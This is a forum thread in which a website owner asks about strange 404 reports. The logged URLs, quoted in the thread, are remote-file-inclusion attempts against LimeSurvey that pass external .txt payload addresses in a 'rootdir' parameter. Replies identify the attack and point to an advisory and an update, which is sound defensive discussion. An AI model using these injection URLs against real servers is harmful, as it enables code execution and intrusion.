My error 404 page e-mails me when it gets activated; it tells me the error URL and the referring URL. Tonight, I've had a lot of error 404 e-mails sent to me, like the ones below. Does anyone know what's going on?

Referring URL: http://[site].com/error404.phprootdir=http://bunt.freehostia.com/mic.txt?
Error URL: http://[site].com/scripts/limesurvey/locale/fr/classes/core/language.php?rootdir=http://bunt.freehostia.com/mic.txt?

Referring URL: http://[site].com/error404.phprootdir=http://www.free-auctions.net/csv/safe.txt???
Error URL: http://[site].com/scripts/limesurvey/locale/de-informal/classes/core/language.php?rootdir=http://www.free-auctions.net/csv/safe.txt???

That is very, very odd.

I would imagine that your site is getting random hits from other sites. Perhaps it's a type of spider?

I'm still getting tons of these reports which lots of different URLs. Today, my web host's abuse department e-mailed me, saying this:

"System administration has recently confirmed that you are currently running a cron job that is in violation of our acceptable use policy. Because the shared hosting servers are configured to process cron jobs with a low priority, a cron job that runs more often than once every minute can be queued up and run far more frequently than intended. This can potentially cause unnecessary load on the server."

I told them I have no idea what's going on, and am waiting to hear back. Any further insight?

Do a google search on "mic.txt safe.txt". It's not just your site... not sure what it's all about though....

http://www.securityfocus.com/bid/26110

They're trying to get your PHP app + your server to execute their file.

Thank you, chazzy. Does this mean they hacked my account, or can it be done from a browser?

Thank you, chazzy. Does this mean they hacked my account, or can it be done from a browser?
It means this particular attack should not be a problem unless you use Lime Survey (http://www.limesurvey.org/) on your site and have not updated to the latest release (1.53).